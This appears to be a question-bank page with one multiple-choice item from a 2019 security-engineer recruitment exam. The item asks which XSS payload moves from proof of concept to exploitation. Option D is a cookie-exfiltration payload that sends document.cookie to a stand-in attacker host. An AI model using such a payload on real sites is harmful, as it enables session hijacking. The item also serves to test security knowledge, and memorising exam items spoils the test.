单选题

哪一个 XSS payload 不是止于概念验证（POC），而...

发布于 2022-03-03 16:30:56

哪一个 XSS payload 不是止于概念验证（POC），而是进行了漏洞利用？（）

A. ?a=location.hash.substr(1)#setTimeout("hi.eval('prompt(location.href)')",500)

B. ?a=window.location.hash.substring(1)#Object.defineProperty(navigator,'userAgent',{get:function(){return '<script>prompt(location.href)</script>'}})

C. x=document.writeln(%22%3Ciframe%3E%3C/iframe%3E%22)let%20f=document.querySelector(%27iframe%27)f.contentWindow.prompt(location)

D. ?x=window.open('http://xxx.me:8080/cookie.asp?msg='+document.cookie)

登录后免费查看答案

关注者

被浏览

1 个回答

相关试卷

哔哩哔哩2019秋招技术岗（安全工程师）笔试题 2022-03-03

知识点

面圈网VIP题库全新上线，海量真题题库资源。 90大类考试，超10万份考试真题开放下载啦

去下载看看